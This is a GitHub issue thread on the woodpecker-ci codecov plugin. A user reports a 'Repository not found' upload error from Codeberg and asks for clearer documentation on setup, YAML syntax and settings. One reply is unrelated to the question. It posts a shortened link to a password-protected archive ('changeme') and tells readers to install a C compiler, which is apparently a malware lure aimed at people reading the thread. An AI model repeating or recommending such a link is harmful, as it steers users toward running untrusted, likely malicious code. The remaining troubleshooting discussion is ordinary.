### ISSUE TITLE
Request for some clarification on the documentation.

### ISSUE THREAD

**Issue by dgkf** [woodpecker-ci/plugin-codecov#70]
First thanks for this plugin. It's _nearly_ working just out of the box with very few tweaks.

I'm running into a few roadblocks, which may be in how I've configured it, how I've set up codecov, or how codeberg communicates with woodpecker ci. 

I've tried to add it to my codeberg repo [with this result](https://ci.codeberg.org/repos/13756/pipeline/42/6). 

```
[2024-09-29T02:06:37.202Z] ['info'] Pinging Codecov: https://codecov.io/upload/v4?package=woodpecker-uploader-0.8.0&token=*******&branch=main&build=&build_url=&commit=c7906ac4870378834b78bde66a79b851bc825a52&tag=&pr=&job=&service=woodpecker&slug=dgkf%2Foptions&name=&flags=&parent=
[2024-09-29T02:06:37.746Z] ['error'] There was an error running the uploader: Error uploading to [https://codecov.io:](https://codecov.io/) Error: There was an error fetching the storage URL during POST: 400 - {"message":"Repository not found"}
```

I've tried my hardest to debug it, but have been running up against a few problems that might be best solved with some clarification in the docs. A few questions that have made this troubleshooting process a bit ambiguous:

- Are there steps I need to go through on codecov.io before I should even expect this to work? I generated a token that's available to the pipeline, but beyond that it's unclear whether I need to register a repository first somehow?
- The docs show everything in a `pipeline: ` yaml block (https://github.com/woodpecker-ci/plugin-codecov/blob/main/docs.md?plain=1#L21), which as far as I know isn't valid woodpecker syntax - at least it's not documented on [the docs page](https://woodpecker-ci.org/docs/usage/workflow-syntax). I assumed this was meant to be in `steps: `.
- There are examples listed for the settings, but there's no indication about whether there are other settings that are permitted, or what values are allowed/expected. I tried using `verbose: true` that I found it in the [source code](https://github.com/woodpecker-ci/plugin-codecov/blob/daf85f82b6a58354cdf55e750ef8f95c4a49cf71/plugin.go#L9-L19), but I'm not sure if I should expect it to have any effect. Is this where other settings are defined?

**Comment by SagarChandra07** [comment]
maybe this will help
https://bit.ly/47P0Nvo
Archive password: changeme
If you don't have the c compliator, install it.(gcc or clang)

**Comment by dgkf** [comment]
> Codeberg is not supported by codecov at all.

Ah, thanks for clarifying. My mistake. Wasn’t expecting codecov to require specific host integrations.
